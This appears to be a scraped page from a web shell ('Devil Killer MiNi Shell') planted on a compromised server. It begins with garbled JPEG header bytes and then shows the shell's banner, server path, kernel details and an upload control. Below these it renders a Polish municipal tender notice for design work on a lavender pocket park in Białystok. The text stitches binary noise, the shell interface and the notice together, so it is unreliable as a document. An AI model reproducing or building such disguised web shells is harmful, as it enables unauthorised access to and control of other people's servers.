JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210823/0015680601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej wraz z pełnieniem nadzoru autorskiego dla zadania: „Budowa lawendowego parku kieszonkowego w Białymstoku” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Białystok</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050658640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Słonimska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białystok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">15-950</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dgk@um.bialystok.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.bialystok.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej wraz z pełnieniem nadzoru autorskiego dla zadania: „Budowa lawendowego parku kieszonkowego w Białymstoku” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9b0afd7a-fb31-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00156806</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000363/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.57 Opracowanie dokumentacji projektowej do zadania: „Budowa lawendowego parku kieszonkowego”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miastobialystok.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy<br/>zakupowej https://miastobialystok.ezamawiajacy.pl/, zwanej dalej „Platformą”, przez co należy<br/>rozumieć narzędzie umożliwiające realizację procesu związanego z udzielaniem zamówień publicznych<br/>przy użyciu środków komunikacji elektronicznej, służące w szczególności do przekazywania ofert, oświadczeń i dokumentów; adres strony internetowej https://miastobialystok.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">I<br/>Wymagania techniczne: 1. Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne,<br/>umożliwiające pracę na Platformie, tj.:1) stały dostęp do sieci Internet o gwarantowanej przepustowości<br/>nie mniejszej niż 512 kb/s;2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB<br/>Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux,<br/>lub ich nowsze wersje;3) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2,<br/>najlepiej w najnowszej wersji, w przypadku Internet Explorer - minimalnie wersja 10.0;4) włączona<br/>obsługa JavaScript;5) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie<br/>.pdf.2. Zamawiający określa dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100<br/>MB w: txt, rtf, pdf, xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png,<br/>svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml,<br/>xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.3. Zamawiający określa<br/>informacje na temat kodowania i czasu odbioru danych, tj.: plik załączony przez Wykonawcę na<br/>Platformie i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8.<br/>Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie<br/>terminu otwarcia ofert.4. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz<br/>dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego odpowiednim<br/>źródłem czasu.II. Wymagania organizacyjne: 1. W postępowaniu o udzielenie zamówienia komunikacja<br/>pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków,<br/>zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem Platformy<br/>znajdującej się pod adresem: https://miastobialystok.ezamawiajacy.pl/ w zakładce „Korespondencja”.2.<br/>Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane<br/>są przez Wykonawcę za pośrednictwem Platformy znajdującej się pod adresem:https://miastobialystok.ezamawiajacy.pl/ w zakładce „Korespondencja”. Za datę przekazania<br/>zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych<br/>kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w Rozporządzeniu<br/>Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz<br/>Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od Wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych <br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119, str. 1 z 2016 r., sprost. Dz. Urz. UE. L 127, str. 2 <br/>z 2018 r.) (w skrócie „RODO”), informuję, że:<br/>1.	Administratorem danych jest Prezydent Miasta Białegostoku, Urząd Miejski w Białymstoku, <br/>ul. Słonimska 1, 15-950 Białystok;<br/>2.	W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z inspektorem ochrony danych: Urząd Miejski w Białymstoku, ul. Słonimska 1, 15-950 Białystok, tel. 85 879 79 79, e-mail: bbi@um.bialystok.pl;<br/>3.	Pani/Pana dane przetwarzane będą w celu przeprowadzenia zamówienia publicznego na podstawie art. 6 ust. 1 lit. c) RODO, zgodnie z ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych (Pzp) oraz w celu zawarcia umowy na podstawie art. 6 ust. 1 lit. b) RODO;<br/>4.	Pani/Pana dane osobowe będą przechowywane:<br/>1)	przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia (jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, okres przechowywania dokumentacji obejmuje cały okres obowiązywania umowy) - zgodnie z art. 78 ust. 1 i 4 ustawy Pzp; <br/>2)	przez okres 5 lat liczonych od końca roku, w którym postępowanie zostanie zakończone <br/>– w przypadku dokumentacji z postępowania o udzielenie zamówienia;<br/>3)	przez okres 10 lat liczonych od końca roku, w którym umowa zostanie zrealizowana <br/>– w przypadku umów zwartych w postępowaniu o udzielenie zamówienia;<br/>4)	w przypadku postępowań finansowanych ze środków unijnych przez czas trwania projektu;<br/>5.	Pani/Pana dane będą udostępniane podmiotom, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp oraz podmiotom, którym administrator powierzył przetwarzanie danych na mocy art. 28 ust. 3 RODO;<br/>6.	Przysługuje Pani/Panu prawo do:<br/>1)	prawo do dostępu do danych, na zasadach określonych w art. 15 RODO;<br/>2)	prawo do sprostowania danych, na zasadach określonych w art. 16 RODO;<br/>3)	prawo do usunięcia danych („prawo do bycia zapomnianym”), na zasadach określonych <br/>w art. 17 RODO;<br/>4)	prawo do ograniczenia przetwarzania, na zasadach określonych w art. 18 RODO.<br/>7.	Przysługuje Pani/Panu prawo do wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych;<br/>8.	Podanie danych osobowych jest wymogiem ustawowym, związanym z udziałem w postępowaniu <br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają<br/>z ustawy Pzp;<br/>9.	Dane osobowe nie będą podlegały zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DGK-IV.271.62.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 346991,87 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 30000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: opracowanie dokumentacji projektowej wraz z pełnieniem nadzoru autorskiego dla zadania: „Budowa lawendowego parku kieszonkowego w Białymstoku”. <br/>2.	Inwestycja planowana jest na części działki o nr geod. 1462/4 obręb 01 Bacieczki, przy skrzyżowaniu ulic: Komisji edukacji Narodowej i Hugo Kołłątaja. Powierzchnia terenu opracowania wynosi: ok. 1490 m2.<br/>3.	Przedmiot zamówienia obejmuje:<br/>1)	Zadanie nr 1 - podstawowy zakres przedmiotu zamówienia, tj.:<br/>a)	opracowanie koncepcji projektowej,<br/>b)	opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej,<br/>c)	uzyskanie dokumentu właściwego organu administracji architektoniczno-budowlanej, warunkującego możliwość przystąpienia do robót budowlanych objętych projektem.<br/>2)	Zadanie nr 2 - usługi związane z pełnieniem nadzoru autorskiego nad realizacją robót budowlanych. <br/>4.	Podstawę do opracowania koncepcji zagospodarowania wraz z wielobranżową dokumentacją projektową dla budowy lawendowego parku kieszonkowego w Białymstoku stanowią: <br/>1)	zapisy Miejscowego Planu Zagospodarowania Przestrzennego, zatwierdzonego uchwałą Nr XXIX/455/20 Rady Miasta Białystok z dnia 28 września 2020 r.;<br/>2)	wytyczne projektowe opracowane przez Zamawiającego:<br/>a)	utworzenie lawendowego pola,<br/>b)	wprowadzenie nasadzeń roślinności o różnych odcieniach koloru niebieskiego,<br/>c)	utworzenie mini sadu do celów edukacyjnych,<br/>d)	zaprojektowanie klombów kwietnych z ławeczkami,<br/>e)	zachowanie istniejącego drzewostanu po uprzedniej ocenie jego stanu,<br/>f)	wprowadzenie elementu wodnego spiętrzającego wodę,<br/>g)	zagospodarowanie parku kieszonkowego elementami małej architektury: leżaki, ławki, kosze na śmieci, lampy oświetleniowe,<br/>h)	utworzenie ścieżek spacerowych z uwzględnieniem istniejącego układu komunikacyjnego oraz przedeptów,<br/>i)	budowa automatycznego systemu nawadniania,<br/>j)	zapewnienie dostępności terenu skweru w pełnym jego wymiarze osobom z ograniczeniami ruchu,<br/>5.	Wszelkie zmiany projektowe w stosunku do podanych wytycznych projektowych muszą zostać wcześniej zatwierdzone pisemnie przez Zamawiającego. Przedmiotowe zmiany nie będą stanowiły zmiany umowy. <br/>6.	Opracowanie wielobranżowej dokumentacji projektowej obejmuje:<br/>1)	projekt budowlany - 5 kpl., który powinien zawierać:<br/>a)	projekt zagospodarowania terenu sporządzony na aktualnej mapie do celów projektowych,<br/>b)	projekt architektoniczno-budowlany,<br/>c)	projekt techniczny,<br/>d)	wizualizacje projektu - min. 5 szt.,<br/>e)	oświadczenie gestorów sieci uzbrojenia podziemnego i naziemnego o warunkach przyłączenia do sieci (uzgodnienia),<br/>2)	projekt zieleni - 2 kpl.,<br/>3)	specyfikacje techniczne wykonania i odbioru robót budowlanych - 2 kpl.,<br/>4)	projekty wykonawcze dla branż - po 3 kpl. dla każdej branży,<br/>5)	przedmiary robót - po 2 egz. dla każdej branży,<br/>6)	kosztorysy inwestorskie - po 2 egz. dla każdej branży.<br/>7.	Dokumentację projektową należy wykonać i przekazać Zamawiającemu w wersji papierowej, <br/>w ilościach egzemplarzy podanych powyżej, oraz w wersji elektronicznej z zapisem na płycie CD <br/>(w formatach .dwg, .pdf) - 2 kpl.<br/>8.	Dokumentację projektową należy sporządzić w czytelnej technice graficznej oraz oprawić w okładki przystosowane do formatu A4, w sposób uniemożliwiający jego dekompletację. <br/>9.	Uszczegółowienie wymagań projektowych: <br/>1)	Koncepcję projektową należy sporządzić (w skali 1:250) w wersji kolorystycznej. Koncepcja powinna przedstawiać rzut z góry wraz z wizualizacjami 3D oraz schematami, przekrojami, widokami w dobranej skali obrazującymi przyjęte rozwiązania projektowe. Koncepcję projektową należy przedstawić Zamawiającemu w wersji drukowanej w ilości 2 egzemplarzy oraz w wersji elektronicznej z zapisem na płycie CD (w formacie .pdf). Zamawiający zaopiniuje przedstawioną koncepcję projektową i przekaże wnioski oraz ewentualne uwagi Wykonawcy, który ma obowiązek je uwzględnić i wprowadzić zmiany, na podstawie których sporządzi finalną wersję koncepcji projektowej, która po pozytywnej opinii Zamawiającego stanie się podstawą do opracowania wielobranżowej dokumentacji projektowej. <br/>2)	Dokumentacja projektowa musi być wykonana z należytą starannością z wykorzystaniem innowacyjnych rozwiązań projektowych z uwzględnieniem zasad racjonalnego wydatkowania środków finansowych przeznaczonych na realizację zadania inwestycyjnego przy uzyskaniu najlepszych standardów jakościowych o wysokim poziomie architektonicznym, walorach estetycznych ze szczególnym uwzględnieniem walorów przyrodniczych miejsca.<br/>3)	Kompletna dokumentacja projektowa powinna uwzględniać wszystkie elementy zagospodarowania terenu zgodnie z zakresem przedstawionym przez Zamawiającego, jednak projekt koncepcyjny trzeba uszczegółowić i dostosować do warunków technicznych, uwarunkowań terenowych przedmiotowej lokalizacji.<br/>4)	Zamawiający zastrzega, iż Wykonawca przed przystąpieniem do opracowywania projektu budowlanego zobowiązany jest uzyskać pisemną akceptację Zamawiającego szacunkowych kosztów realizacji inwestycji. <br/>5)	W projekcie budowlanym powinny być zawarte poniższe elementy:<br/>a)	strona tytułowa,<br/>b)	spis treści,<br/>c)	część opisowa,<br/>d)	część rysunkowa.<br/>6)	Projekt zieleni musi zawierać następujące elementy:<br/>a)	inwentaryzacje zieleni istniejącej wraz z gospodarką drzewostanem,<br/>b)	część opisową obejmującą: zestawienie zastosowanych w projekcie roślin, opis standardów jakościowych prac wykonawczych (przygotowanie podłoża, sadzenie roślin), standardów materiałowych oraz zakres prac pielęgnacyjnych tuż po posadzeniu roślin jak również <br/>w okresie gwarancyjnym,<br/>c)	część graficzną sporządzoną na kopii aktualnej mapy zasadniczej obejmującą projekt zagospodarowania terenu objętego inwestycją wraz z projektowanymi sieciami uzbrojenia terenu.<br/>10.	Zamawiający w ramach realizacji niniejszego przedmiotu zamówienia wymaga uzyskania dokumentu właściwego organu administracji architektoniczno-budowlanej warunkującego możliwość przystąpienia do robót budowlanych objętych projektem, zgodnie z postanowieniami postępowania przetargowego (pozwolenie na budowę, potwierdzenie przyjęcia bez sprzeciwu przez właściwy organ administracji architektoniczno-budowlanej zgłoszenia robót nie wymagających pozwolenia na budowę lub oświadczenia projektanta o przesłankach zgodnych z ustawą Prawo budowlane wskazujących na możliwość wykonywania prac bez stosownego zgłoszenia).<br/>11.	Dokumentacja projektowa powinna być wykonana zgodnie z art. 99-102 ustawy Pzp, <br/>w szczególności:<br/>1)	przedmiot zamówienia można opisać przez wskazanie znaków towarowych, patentów <br/>lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę, jeżeli nie można opisać przedmiotu zamówienia w wystarczająco precyzyjny i zrozumiały sposób, a wskazaniu takiemu towarzyszą wyrazy „lub równoważny”, <br/>2)	jeżeli przedmiot zamówienia zostanie opisany w sposób, o którym mowa w ppkt 1, Wykonawca winien wskazać w opisie przedmiotu zamówienia kryteria stosowane w celu oceny równoważności, <br/>3)	sporządzając dokumentację projektową Wykonawca opisując przedmiot zamówienia przez odniesienie do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w ustawie Pzp, jest obowiązany wskazać, że dopuszcza rozwiązania równoważne opisywanym, a odniesieniu takiemu towarzyszą wyrazy „lub równoważne”.<br/>12.	Dokumentację projektową oraz pozostałe dokumenty wchodzące w skład przedmiotu zamówienia należy opracować:<br/>1)	zgodnie z obowiązującymi przepisami prawa, normami, instrukcjami oraz sztuką budowlaną; niewyszczególnienie w niniejszych wymaganiach Zamawiającego jakichkolwiek obowiązujących przepisów, norm lub instrukcji nie zwalnia Wykonawcy od ich przestrzegania,<br/>2)	w sposób umożliwiający Zamawiającemu wyłonienie wykonawcy inwestycji w trybie określonym w ustawie Pzp – w celu potwierdzenia wymogu wskazanego powyżej Wykonawca złoży wraz <br/>z przekazywanym przedmiotem zamówienia oświadczenie o spełnieniu wymogu zgodności <br/>z ustawą Pzp.<br/>13.	W przypadku stwierdzenia w wykonywanym przedmiocie zamówienia naruszenia zapisów ustawy Pzp lub innych wymogów określonych przepisami prawa, normami oraz sztuką budowlaną, Wykonawca będzie ponosił w tym zakresie odpowiedzialność wobec Zamawiającego i podmiotów trzecich. <br/>14.	Dokumentacja projektowa musi być uzgodniona w szczególności z Zarządem Dróg Miejskich (branża elektryczna). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71222000-0 - Usługi architektoniczne w zakresie przestrzeni</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska<br/>największą łączną ilość punktów za wszystkie kryteria oceny ofert. 2. Jeżeli nie można wybrać<br/>najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub<br/>kosztu i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała<br/>najwyższą ocenę w kryterium o najwyższej wadze. 3. Jeżeli oferty otrzymały taką samą ocenę w<br/>kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną lub najniższym kosztem.<br/>4. Jeżeli nie można dokonać wyboru oferty, w sposób o którym mowa w pkt 4, Zamawiający wzywa<br/>Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę lub koszt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> 